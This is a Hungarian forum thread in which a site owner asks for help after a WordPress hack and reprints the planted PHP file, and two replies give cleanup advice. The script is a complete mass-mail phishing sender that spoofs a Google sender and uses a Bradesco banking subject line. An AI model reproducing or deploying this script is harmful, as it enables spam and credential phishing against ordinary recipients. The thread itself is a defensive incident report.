Eredmény: 1 - 3 (3) összesen

Téma: WordPress feltörés, több ezres kimenő levelek

  1. #1
    Tag
    Csatlakozott
    11-08-24
    Hozzászólás
    78
    Begyűjtött 3 köszönetet
    3 hozzászólásával

    Alapbeállítás WordPress feltörés, több ezres kimenő levelek

    Sziasztok,

    A szolgáltatóm hétvégén szólt, hogy több ezres kimenő levelek vannak, egy php file okozza, mely a WP-n keresztül került fel. Akkor törlésre került, de most megint fent volt. Most envia2.php néven.
    Próbáltam rákeresni a kódra, de nem sikerült olyan oldalra lelnem, ahol megoldást írtak volna a problémára.
    Amit még meg tudtam tenni, feltettem a Limit Login Attempts és a File Monitor plugninokat.

    Valakinek esetleg volt hasonló tapasztalata? A szolgáltató azt mondta, ha nem csinálok vele valamit, akkor letiltja az oldalt ( csinálhat ilyet?), de amit tudtam azt megtettem. átírtam FTP jelszót is, meg a WP adminisztrátori regemnél is a jelszót...

    Ez lenne az:

    HTML kód:
    <?php
    $testa = $_POST['veio'];
    if($testa != "") {
        $message = $_POST['html'];
        $subject = $_POST['assunto'];
        $nome = $_POST['nome'];
        $de = $_POST['de'];
        $to = $_POST['emails'];
    
        $headers  = "MIME-Version: 1.0\r\n";
        $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
    
        $email = explode("\n", $to);
        $headers .= "From: ".$nome." <".$de.">\r\n";
        $message = stripslashes($message);
    
        $i = 0;
        $count = 1;
        while($email[$i]) {
            $ok = "ok";
            if(mail($email[$i], $subject, $message, $headers))
            echo "* Número: $count <b>".$email[$i]."</b> <font color=green>Google OK!</font><br><hr>";
            else
            echo "* Número: $count <b>".$email[$i]."</b> <font color=red>Google ERROR!</font><br><hr>";
            $i++;
            $count++;
        }
        $count--;
        if($ok == "ok")
        echo ""; 
    
    }
    
    ?>
    <html>
    <head>
    <title>:: ENVIADORES GOOGLE - PRIV8 ::</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <style>
    body {
        margin-left: 0;
        margin-right: 0;
        margin-top: 0;
        margin-bottom: 0;
    }
    .titulo {
        font-family: Arial, Helvetica, sans-serif;
        font-size: 70px;
        color: #000000;
        font-weight: bold;
    }
    
    .normal {
        font-family: Arial, Helvetica, sans-serif;
        font-size: 12px;
        color: #000000;
    }
    
    .form {
        font-family: Arial, Helvetica, sans-serif;
        font-size: 10px;
        color: #333333;
        background-color: #FFFFFF;
        border: 1px dashed #666666;
    }
    
    .texto {
        font-family: Verdana, Arial, Helvetica, sans-serif;
        font-weight: bold;
    }
    
    .alerta {
        font-family: Verdana, Arial, Helvetica, sans-serif;
        font-weight: bold;
        color: #990000;
        font-size: 10px;
    }
    </style>
    </head>
    <body>
    <form action="" method="post" enctype="multipart/form-data" name="form1">
      <input type="hidden" name="veio" value="sim">
      <table width="590" height="511" border="0" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC" class="normal">
        <tr>
          <td width="588" height="25" align="center" bgcolor="#FFFFFF"><span class="titulo"><font color="#0000FF" face="Verdana, Arial, Helvetica, sans-serif">G</font><font color="#FF0000" face="Verdana, Arial, Helvetica, sans-serif">o</font><font color="#FFFF00" face="Verdana, Arial, Helvetica, sans-serif">o</font><font color="#0000FF" face="Verdana, Arial, Helvetica, sans-serif">g</font><font color="#009900" face="Verdana, Arial, Helvetica, sans-serif">l</font><font color="#FF0000" face="Verdana, Arial, Helvetica, sans-serif">e</font><font color="#FF0000"><font color="#000000" size="2" face="Verdana, Arial, Helvetica, sans-serif"> <strong>PRIV8<br>
            </strong></font></font></span></td>
        </tr>
        <tr>
          <td height="194" valign="top" bgcolor="#FFFFFF">
              <table width="100%"  border="0" cellpadding="0" cellspacing="5" class="normal" height="444">
              <tr>
                <td align="right" height="17"><span class="texto"><font size="3">De:<br>
                  <br>
                E-mail:</font> </span></td>
                <td width="65%" height="17">
                <input name="nome" type="text" class="form" id="nome" style="width:50%" value="Google PRIV8" size="1" >
                <br>
                <br>
                <input name="de" type="text" class="form" id="de" style="width:49%" value="priv8@google.com" size="1"></td>
              </tr>
              <tr>
                <td align="right" height="20"><font size="3"><span class="texto"><br>
                Assunto:</span></font></td>
                <td height="17">
                  <br>
                <input name="assunto" type="text" class="form" id="assunto" style="width:100%" value="Bradesco Internet Banking" size="1" ></td>
              </tr>
              <tr align="center" bgcolor="#FFFFFF">
                <td height="17" colspan="2"><span class="texto"><font size="3"><br>
                  C&oacute;digo
                HTML:<br>
                </font></span></td>
              </tr>
              <tr align="right">
                <td height="146" colspan="2" valign="top"><br>
                 <textarea name="html" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="html" cols="1">Coloque sua Engenharia.
    </textarea>
                  <span class="alerta"><font color="#FF0000">*TEXTO EM HTML</font></span></td>
    
    
    
              </tr>
              <tr align="center" bgcolor="#FFFFFF">
                <td height="47" colspan="2"><p><span class="texto"><font size="3">Lista
                de emails:</font></span></td>
              </tr>
              <tr align="right">
                <td height="136" colspan="2" valign="top"><font color="#003399"><br>
                    <textarea name="emails" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="emails" cols="1">gkstar1@uol.com.br
    gkstar1@terra.com.br
    </textarea>
                    <span class="alerta"><font color="#FF0000">*SEPARADO POR QUEBRA DE LINHA</font></span></font></td>
              </tr>
              <tr>
                <td height="26" colspan="2" align="right" valign="top" bgcolor="#FFFFFF"><div align="center">
                  <input type="submit" name="Submit" value="[__________+++Google Sender+++__________]">
                </div></td>
              </tr>
            </table>
          </td>
        </tr>
        <tr>
          <td height="15" align="center" bgcolor="#FFFFFF"><font size="4" face="Verdana, Arial, Helvetica, sans-serif"><strong>.............................PowereD
          bY r00t.............................</strong></font></td>
        </tr>
      </table>
      <div align="left"></div>
    </form>
    </body>




  2. #2
    Bölcs rendszergazda logója
    Csatlakozott
    09-07-25
    Hozzászólás
    565
    Begyűjtött 108 köszönetet
    65 hozzászólásával

    Alapbeállítás re: WordPress feltörés, több ezres kimenő levelek

    Sajnos elég sok biztonsági gond volt mostanában a WP-el ill. pluginokkal, több lehetővé tette állomány feltölését is, és onnantól már szabad préda volt az oldalad sajna. Frissíts mindent az aktuális verzióra, ill. alaposan nézd át a tárhelyed, mindenféle fura könyvtárat is pl. themes/cache oda nem illő állományok után kutatva. Képeket is nézd át, van hogy egy pár byte-os GIF header után PHP kódot rejt az állomány.


    x

  3. #3
    Bölcs Andrea logója
    Csatlakozott
    08-03-26
    Hozzászólás
    1.033
    Begyűjtött 278 köszönetet
    213 hozzászólásával

    Alapbeállítás re: WordPress feltörés, több ezres kimenő levelek

    Általában minden szolgáltató ÁSZF-e tartalmazza, hogy a saját weboldalad biztonságáért te felelsz. Vagyis simán megteheti. Sőt, örülhetsz, hogy előbb szólt... Vannak olyan szolgáltatók, akik előbb lecsapják az oldalt (aztán legyen esélyed kiküszöbölni a problémát, ha sehogy nem éred el...).
    Első körben ezt javaslom:
    - keress olyan fájlt/könyvtárat, amit a módosítási időpont szerint nagy valószínűséggel nem te módosítottál - ezt legegyszerűbben ftp-n bejelentkezve tudod megnézni,
    - nézd meg, hogy nincs-e valami oda nem illő dolog a htaccess és a wp-config.php fájlodban,
    - aztán játszd végig ezt: hxxp://www.tutorial.hu/wordpress-biztonsagi-tippek/



Könyvjelzők

Hozzászólás szabályai

  • Új témákat nem hozhatsz létre
  • Válaszokat nem küldhetsz
  • Fájlokat nem csatolhatsz
  • A hozzászólásaidat nem módosíthatod
  •